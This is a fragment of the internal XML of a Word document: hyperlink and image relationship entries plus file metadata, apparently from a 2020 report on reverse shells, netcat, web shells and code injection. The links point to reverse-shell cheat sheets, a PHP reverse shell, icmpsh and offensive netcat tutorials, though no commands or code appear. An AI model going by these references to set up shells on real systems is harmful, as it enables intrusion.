Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsparker.com/blog/web-security/privilege-escalation/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><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www.linuxjournal.com/content/more-using-bashs-built-devtcp-file-tcpip" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingtutorials.org/networking/hacking-with-netcat-part-1-the-basics/" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virtualhackinglabs.com/?utm_source=ht&amp;utm_medium=postbanner&amp;utm_campaign=ht" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/tools/web-shells/php-reverse-shell" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsparker.com/blog/web-security/code-injection/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/inquisb/icmpsh" TargetMode="External"/><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image" Target="media/image29.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.kali.org/maintaining-access/sbd" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsparker.com/blog/web-security/code-injection/" TargetMode="Externa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hyperlink" Target="https://highon.coffee/blog/reverse-shell-cheat-sheet/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingtutorials.org/networking/hacking-with-netcat-part-3-advanced-techniques/" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpe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cunetix.com/blog/articles/exploiting-sql-injection-example/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://octoverse.github.com/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/interference-security/icmpsh"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pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><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hyperlink" Target="https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/websitesecurity/introduction-web-shells/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/"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man7.org/linux/man-pages/man1/ncat.1.html" TargetMode="External"/><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image" Target="media/image32.jpeg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hakshop.com/collections/usb-rubber-ducky" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://neilsec.com/knowledge/netcat/" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpeg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.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39</Pages>
  <Words>5826</Words>
  <Characters>33209</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>276</Lines>
  <Paragraphs>77</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>38958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Umar Tariq</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Muhammad Umar Tariq</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-27T08:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-27T08:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>